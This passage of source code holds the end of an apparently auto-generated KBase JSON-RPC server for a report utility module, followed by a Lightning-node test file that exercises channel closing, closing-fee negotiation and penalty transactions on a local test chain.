submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_Report_util_landml.assembly_metadata_report,
name='Report_util_landml.assembly_metadata_report',
types=[dict])
self.method_authentication['Report_util_landml.assembly_metadata_report'] = 'required' # noqa
self.rpc_service.add(impl_Report_util_landml.genome_report,
name='Report_util_landml.genome_report',
types=[dict])
self.method_authentication['Report_util_landml.genome_report'] = 'required' # noqa
self.rpc_service.add(impl_Report_util_landml.genomeset_report,
name='Report_util_landml.genomeset_report',
types=[dict])
self.method_authentication['Report_util_landml.genomeset_report'] = 'required' # noqa
self.rpc_service.add(impl_Report_util_landml.domain_report,
name='Report_util_landml.domain_report',
types=[dict])
self.method_authentication['Report_util_landml.domain_report'] = 'required' # noqa
self.rpc_service.add(impl_Report_util_landml.tree_report,
name='Report_util_landml.tree_report',
types=[dict])
self.method_authentication['Report_util_landml.tree_report'] = 'required' # noqa
self.rpc_service.add(impl_Report_util_landml.featseq_report,
name='Report_util_landml.featseq_report',
types=[dict])
self.method_authentication['Report_util_landml.featseq_report'] = 'required' # noqa
self.rpc_service.add(impl_Report_util_landml.protcomp_report,
name='Report_util_landml.protcomp_report',
types=[dict])
self.method_authentication['Report_util_landml.protcomp_report'] = 'required' # noqa
self.rpc_service.add(impl_Report_util_landml.status,
name='Report_util_landml.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'Report_util_landml ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test_closing.py
|
from fixtures import * # noqa: F401,F403
from flaky import flaky
from pyln.client import RpcError, Millisatoshi
from shutil import copyfile
from pyln.testing.utils import SLOW_MACHINE
from utils import (
only_one, sync_blockheight, wait_for, TIMEOUT,
account_balance, first_channel_id, closing_fee, TEST_NETWORK,
scriptpubkey_addr, calc_lease_fee, EXPERIMENTAL_FEATURES
)
import os
import queue
import pytest
import re
import subprocess
import threading
import unittest
@pytest.mark.developer("Too slow without --dev-groestlcoind-poll")
def test_closing(node_factory, bitcoind, chainparams):
l1, l2 = node_factory.line_graph(2)
chan = l1.get_channel_scid(l2)
fee = closing_fee(3750, 2) if not chainparams['elements'] else 3603
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
bitcoind.generate_block(5)
wait_for(lambda: len(l1.getactivechannels()) == 2)
wait_for(lambda: len(l2.getactivechannels()) == 2)
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
# This may either be from a local_update or an announce, so just
# check for the substring
assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
l1.rpc.close(chan)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: len(l2.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(bitcoind.rpc.getrawmempool(False))
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
]
bitcoind.generate_block(1)
l1.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
l2.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
# Make sure both nodes have grabbed their close tx funds
assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
])
bitcoind.generate_block(9)
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
])
# Make sure both have forgotten about it
bitcoind.generate_block(90)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
# The entry in the channels table should still be there
assert l1.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
assert l2.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
def test_closing_while_disconnected(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
chan = l1.get_channel_scid(l2)
l1.pay(l2, 200000000)
l2.stop()
# The close should still be triggered afterwards.
fut = executor.submit(l1.rpc.close, chan, 0)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.start()
fut.result(TIMEOUT)
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(121)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_disconnected_notify(node_factory, bitcoind, executor):
l1, l2 = node_factory.line_graph(2)
l1.pay(l2, 200000000)
l2.stop()
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
out = subprocess.check_output(['cli/lightning-cli',
'--network={}'.format(TEST_NETWORK),
'--lightning-dir={}'
.format(l1.daemon.lightning_dir),
'close',
l2.info['id'],
'5']).decode('utf-8').splitlines()
assert out[0] == '# peer is offline, will negotiate once they reconnect (5 seconds before unilateral close).'
assert out[1] == '# Timed out, forcing close.'
assert not any([line.startswith('#') for line in out[2:]])
def test_closing_id(node_factory):
"""Test closing using peer ID and full channel ID
"""
l1, l2 = node_factory.get_nodes(2)
# Close by full channel ID.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
l2.rpc.close(cid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
# Close by peer ID.
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l1.daemon.wait_for_log("Handed peer, entering loop")
l2.fundchannel(l1, 10**6)
pid = l1.info['id']
l2.rpc.close(pid)
wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@pytest.mark.slow_test
def test_closing_torture(node_factory, executor, bitcoind):
# We set up a fully-connected mesh of N nodes, then try
# closing them all at once.
amount = 10**6
num_nodes = 10 # => 45 channels (36 seconds on my laptop)
if node_factory.valgrind:
num_nodes -= 4 # => 15 (135 seconds)
nodes = node_factory.get_nodes(num_nodes)
# Make sure bitcoind has plenty of utxos
bitcoind.generate_block(num_nodes)
# Give them all plenty of UTXOs, make sure they see them
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
addr = nodes[i].rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txs = []
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
nodes[i].rpc.connect(nodes[j].info['id'], 'localhost', nodes[j].port)
txs.append(nodes[i].rpc.fundchannel(nodes[j].info['id'], amount)['txid'])
# Make sure they're all in, then lock them in.
bitcoind.generate_block(1, wait_for_mempool=txs)
# Wait for them all to be CHANNELD_NORMAL
for n in nodes:
wait_for(lambda: all(p['channels'][0]['state'] == 'CHANNELD_NORMAL' for p in n.rpc.listpeers()['peers']))
# Start closers: can take a long time under valgrind!
futures = []
for i in range(len(nodes)):
for j in range(i + 1, len(nodes)):
futures.append(executor.submit(nodes[i].rpc.close, nodes[j].info['id']))
futures.append(executor.submit(nodes[j].rpc.close, nodes[i].info['id']))
# Wait for close to finish
close_txs = set()
for f in futures:
# If one side completes closing, we'll get an error here 'Peer has no active channel'
try:
close_txs.add(f.result(TIMEOUT)['txid'])
except RpcError as err:
assert err.error['message'] == 'Peer has no active channel'
# Should have one close for each open.
assert len(close_txs) == len(txs)
# Get closes confirmed
bitcoind.generate_block(100, wait_for_mempool=list(close_txs))
# And make sure they hangup.
for n in nodes:
wait_for(lambda: n.rpc.listpeers()['peers'] == [])
@pytest.mark.slow_test
def test_closing_different_fees(node_factory, bitcoind, executor):
l1 = node_factory.get_node()
# Default feerate = 15000/11000/7500/1000
# It will start at the second number, accepting anything above the first.
feerates = [[20000, 11000, 15000, 7400], [8000, 6000, 1001, 100]]
balance = [False, True]
num_peers = len(feerates) * len(balance)
addr = l1.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, 1)
numfunds = len(l1.rpc.listfunds()['outputs'])
bitcoind.generate_block(1)
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)
# Create them in a batch, for speed!
peers = []
for feerate in feerates:
for b in balance:
p = node_factory.get_node(feerates=feerate)
p.feerate = feerate
p.balance = balance
l1.rpc.connect(p.info['id'], 'localhost', p.port)
peers.append(p)
for p in peers:
p.channel = l1.rpc.fundchannel(p.info['id'], 10**6, minconf=0)['channel_id']
# Technically, this is async to fundchannel returning.
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(6)
# Now wait for them all to hit normal state, do payments
l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
+ ['to CHANNELD_NORMAL'] * num_peers)
for p in peers:
if p.balance:
l1.pay(p, 100000000)
# Now close all channels (not unilaterally!)
closes = [executor.submit(l1.rpc.close, p.channel, 0) for p in peers]
for c in closes:
c.result(90)
# close does *not* wait for the sendrawtransaction, so do that!
# Note that since they disagree on the ideal fee, they may conflict
# (first one in will win), so we cannot look at logs, we need to
# wait for mempool.
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)
bitcoind.generate_block(1)
for p in peers:
p.daemon.wait_for_log(' to ONCHAIN')
wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
disconnects = ['-WIRE_CLOSING_SIGNED',
'@WIRE_CLOSING_SIGNED',
'+WIRE_CLOSING_SIGNED']
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
'may_reconnect': True},
{'may_reconnect': True}])
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
l1.rpc.close(l2.info['id'])
l1.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')
# Now verify that the closing tx is in the mempool.
bitcoind.generate_block(6, wait_for_mempool=1)
sync_blockheight(bitcoind, [l1, l2])
for n in [l1, l2]:
# Ensure we actually got a mutual close.
n.daemon.wait_for_log(r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_specified_destination(node_factory, bitcoind, chainparams):
l1, l2, l3, l4 = node_factory.get_nodes(4)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
l1.rpc.connect(l4.info['id'], 'localhost', l4.port)
chan12, _ = l1.fundchannel(l2, 10**6)
chan13, _ = l1.fundchannel(l3, 10**6)
chan14, _ = l1.fundchannel(l4, 10**6)
l1.pay(l2, 100000000)
l1.pay(l3, 100000000)
l1.pay(l4, 100000000)
bitcoind.generate_block(5)
addr = chainparams['example_addr']
l1.rpc.close(chan12, None, addr)
l1.rpc.call('close', {'id': chan13, 'destination': addr})
l1.rpc.call('close', [chan14, None, addr])
l1.daemon.wait_for_logs([' to CLOSINGD_SIGEXCHANGE'] * 3)
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == 3)
# Now grab the close transaction
closetxs = {}
for i, n in enumerate([l2, l3, l4]):
billboard = only_one(l1.rpc.listpeers(n.info['id'])['peers'][0]['channels'])['status'][0]
m = re.search(r'CLOSINGD_SIGEXCHANGE.* tx:([a-f0-9]{64})', billboard)
closetxs[n] = m.group(1)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1, l2, l3, l4])
# l1 can't spent the output to addr.
for txid in closetxs.values():
assert not l1.daemon.is_in_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
# Check the txid has at least 1 confirmation
for n, txid in closetxs.items():
n.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))
for n in [l2, l3, l4]:
# Make sure both nodes have grabbed their close tx funds
closetx = closetxs[n]
outputs = n.rpc.listfunds()['outputs']
assert closetx in set([o['txid'] for o in outputs])
output_num2 = [o for o in outputs if o['txid'] == closetx][0]['output']
output_num1 = 0 if output_num2 == 1 else 1
# Check the another address is addr
assert addr == scriptpubkey_addr(bitcoind.rpc.gettxout(closetx, output_num1)['scriptPubKey'])
assert 1 == bitcoind.rpc.gettxout(closetx, output_num1)['confirmations']
def closing_negotiation_step(node_factory, bitcoind, chainparams, opts):
def feerate_for(target, minimum=0, maximum=10000000):
"""Binary search to find feerate"""
assert minimum != maximum
mid = (minimum + maximum) // 2
mid_fee = closing_fee(mid, 1)
if mid_fee > target:
return feerate_for(target, minimum, mid)
elif mid_fee < target:
return feerate_for(target, mid, maximum)
else:
return mid
orate = feerate_for(21000) # closing fee negotiation starts at 21000
prate = feerate_for(20000) # closing fee negotiation starts at 20000
opener, peer = node_factory.line_graph(2, opts=[{'feerates': (orate, orate, orate, orate)},
{'feerates': (prate, prate, prate, prate)}])
opener_id = opener.info['id']
peer_id = peer.info['id']
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
if opts['close_initiated_by'] == 'opener':
opener.rpc.close(peer_id=peer_id, fee_negotiation_step=opts['fee_negotiation_step'])
else:
assert opts['close_initiated_by'] == 'peer'
peer.rpc.close(peer_id=opener_id, fee_negotiation_step=opts['fee_negotiation_step'])
# Get the proclaimed closing fee from the two nodes' statuses
status_agreed_regex = re.compile("agreed on a closing fee of ([0-9]+) satoshi")
# [fee_from_opener_status, fee_from_peer_status]
fees_from_status = [None, None]
def get_fee_from_status(node, peer_id, i):
nonlocal fees_from_status
peer = only_one(node.rpc.listpeers(peer_id)['peers'])
channel = only_one(peer['channels'])
status = channel['status'][0]
m = status_agreed_regex.search(status)
if not m:
return False
fees_from_status[i] = int(m.group(1))
return True
wait_for(lambda: get_fee_from_status(opener, peer_id, 0))
wait_for(lambda: get_fee_from_status(peer, opener_id, 1))
assert opts['expected_close_fee'] == fees_from_status[0]
assert opts['expected_close_fee'] == fees_from_status[1]
# Get the closing transaction from the bitcoind mempool and get its fee
mempool = None
mempool_tx_ids = None
def get_mempool_when_size_1():
nonlocal mempool, mempool_tx_ids
mempool = bitcoind.rpc.getrawmempool(True)
mempool_tx_ids = list(mempool.keys())
return len(mempool_tx_ids) == 1
wait_for(get_mempool_when_size_1)
close_tx_id = mempool_tx_ids[0]
fee_mempool = round(mempool[close_tx_id]['fee'] * 10**8)
assert opts['expected_close_fee'] == fee_mempool
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_30pct(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 30%"""
opts = {}
opts['fee_negotiation_step'] = '30%'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20537 if not chainparams['elements'] else 26046
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20233 if not chainparams['elements'] else 25657
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_100pct(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 100%"""
opts = {}
opts['fee_negotiation_step'] = '100%'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20001 if not chainparams['elements'] else 25366
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
# The close fee of 20499 looks strange in this case - one would expect
# to have a number close to 21000. This is because
# * the range is initially set to [20000 (peer), 21000 (opener)]
# * the opener is always first to propose, he uses 50% step, so he proposes 20500
# * the range is narrowed to [20001, 20499] and the peer proposes 20499
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20499 if not chainparams['elements'] else 25998
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_1sat(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 1sat"""
opts = {}
opts['fee_negotiation_step'] = '1'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20989 if not chainparams['elements'] else 26624
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20010 if not chainparams['elements'] else 25373
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
def test_closing_negotiation_step_700sat(node_factory, bitcoind, chainparams):
"""Test that the closing fee negotiation step works, 700sat"""
opts = {}
opts['fee_negotiation_step'] = '700'
opts['close_initiated_by'] = 'opener'
opts['expected_close_fee'] = 20151 if not chainparams['elements'] else 25650
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
opts['close_initiated_by'] = 'peer'
opts['expected_close_fee'] = 20499 if not chainparams['elements'] else 25998
closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@pytest.mark.developer("needs DEVELOPER=1")
def test_penalty_inhtlc(node_factory, bitcoind, executor, chainparams):
"""Test penalty transaction with an incoming HTLC"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# We suppress each one after first commit; HTLC gets added not fulfilled.
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': ['=WIRE_COMMITMENT_SIGNED-nocommit'],
'may_fail': True,
'feerates': (7500, 7500, 7500, 7500),
'allow_broken_log': True,
'plugin': coin_mvt_plugin},
{'disconnect': ['=WIRE_COMMITMENT_SIGNED-nocommit'],
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l1.pay, l2, 100000000)
assert len(l1.getactivechannels()) == 2
assert len(l2.getactivechannels()) == 2
# They should both have commitments blocked now.
l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
# Make sure l1 got l2's commitment to the HTLC, and sent to master.
l1.daemon.wait_for_log('got commitsig')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Should fulfill.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Payment should now complete.
t.result(timeout=10)
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
wait_for(lambda: len(l2.getactivechannels()) == 0)
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')
# FIXME: test HTLC tx race!
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l2])
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
# Do one last pass over the logs to extract the reactions l2 sent
l2.daemon.logsearch_start = needle
needles = [
# The first needle will match, but since we don't have a direct output
# for l2 it won't result in an output, hence the comment:
# r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
r'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
]
matches = list(map(l2.daemon.is_in_log, needles))
# Now extract the txids for these responses
txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])
# We should have one confirmed output for each of the above reactions in
# the list of funds we own.
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 2
